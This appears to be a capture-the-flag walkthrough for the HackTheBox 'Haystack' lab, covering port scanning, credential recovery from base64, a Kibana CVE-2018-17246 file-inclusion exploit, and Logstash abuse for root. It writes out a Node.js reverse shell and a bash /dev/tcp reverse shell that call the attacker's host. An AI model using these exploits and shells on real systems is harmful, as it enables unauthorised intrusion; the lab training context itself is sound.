hackthebox haystach walkthrough

Starting with masscan

# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.115

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-02 17:00:00 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.115                                    
Discovered open port 9200/tcp on 10.10.10.115                                  
Discovered open port 80/tcp on 10.10.10.115    

Three ports are open: ssh, web, api

web does not reveal anything else than a image.

hackthebox – haystack – needle

Using strings command to the image reveals base64 at the end.

# strings needle.jpg
-- snip -- 
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

Decoding the base64

# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d
la aguja en el pajar es "clave"

The above decoded text seems to be spanish and translates to

the needle in the haystack is “key”

hackthebox – needle in the haystack is “key”

Moving to port 9200. This looks api where we can search for key. Trying following:

http://10.10.10.115:9200/_search?q=clave

which gives following

{"took":95,"timed_out":false,"_shards":{"total":11,"successful":11,"skipped":0,"failed":0},"hits":{"total":2,"max_score":5.9335938,"hits":[{"_index":"quotes","_type":"quote","_id":"45","_score":5.9335938,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}},{"_index":"quotes","_type":"quote","_id":"111","_score":5.3459888,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}]}}

Translating it with translate.google.com

{"took": 95, "timed_out": false, "_ shards": {"total": 11, "successful": 11, "skipped": 0, "failed": 0}, "hits": {"total ": 2," max_score ": 5.9335938," hits ": [{" _ index ":" quotes "," _ type ":" quote "," _ id ":" 45 "," _ score ": 5.9335938," _ source ": {"quote": "I have to save the password for the machine: dXNlcjogc2VjdXJpdHkg"}}, {"_ index": "quotes", "_ type": "quote", "_ id": "111", "_ score": 5.3459888 , "_ source": {"quote": "This key can not be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=="}}]}}

Seems like we have something important, decoding base64

# echo dXNlcjogc2VjdXJpdHkg | base64 -d
user: security
# echo cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key

We got username and password for SSH.

# ssh [email protected]
[email protected]'s password: 
Last login: Tue Jul  2 08:43:23 2019 from 10.10.14.34
[[email protected] ~]$ 

We can now read user.txt flag

Playing around we find that the server was running kibana. I found it by checking the open port in the server. The netstat command was not there in the server, therefore, I had to find the way around.

# declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done | sort | uniq
22
42838
43024
46676
47166
48866
49050
49166
49430
5601
60570
80
9200

Notice the port 5601.

There is a CVE for kibana. According to https://github.com/mpgn/CVE-2018-17246 it suffers LFI. Exploiting it

First of all, setup the js file

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4444, "10.10.14.44", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

Save the file as dev.js in /dev/shm/ directory.

Then, listen for shell on port 4444.

# nc -lvnp 4444

Then in box execute following

$ curl "http://127.0.0.1:5601/api/console/[email protected]@SENSE_VERSION&apis=../../../../../../.../../../../dev/shm/dev.js"

You will get a shell

hackthebox – haystack – kibana

Upgrade the shell as defined here.

Again, we can explore more here as kibana user. Then we found an interesting place where we found logstash conf file. At location /etc/logstash/conf.d we found 3 files

input.conf
filter.conf
output.conf

The content are as following

$ cat input.conf
input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"
	}
}

$ cat filter.conf
filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
		}
	}
}

$ cat output.conf
output {
	if [type] == "execute" {
		stdout { codec => json }
		exec {
			command => "%{comando} &"
		}
	}
}

If you are well known about logstash then it may be easy for you. If not then it is searching for an executable file inside /opt/kibana with name “logstash_whatever” and removing it every 10sec. The filter is used to filter the message if it matches a certain pattern. Then, at last, the comando is executed.

To execute our payload we need to match the pattern. This link will be helpful to match the pattern. Go to the site. In the lower box, enter the following…

Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}

Here,
\s* = SPACE
\s+ = NOSPACE
GREEDYDATA = everything

This is content of filter.conf which it is searching to match

…and in upper box try to match the pattern.

After you find the pattern lets create a file called “logstash_dev”

$ vi /opt/kibana/logstash_dev

Paste the following

Ejecutar comando : bash -i >& /dev/tcp/10.10.14.44/5252 0>&1

save the file and make it executable

$ chmod +x /opt/kibana/logstash_dev

Do not forget to listen for shell, wait for some time and you will get root

# nc -lvnp 5252
listening on [any] 5252 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.115] 34416
bash: no hay control de trabajos en este shell
[[email protected] /]# cat /root/root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *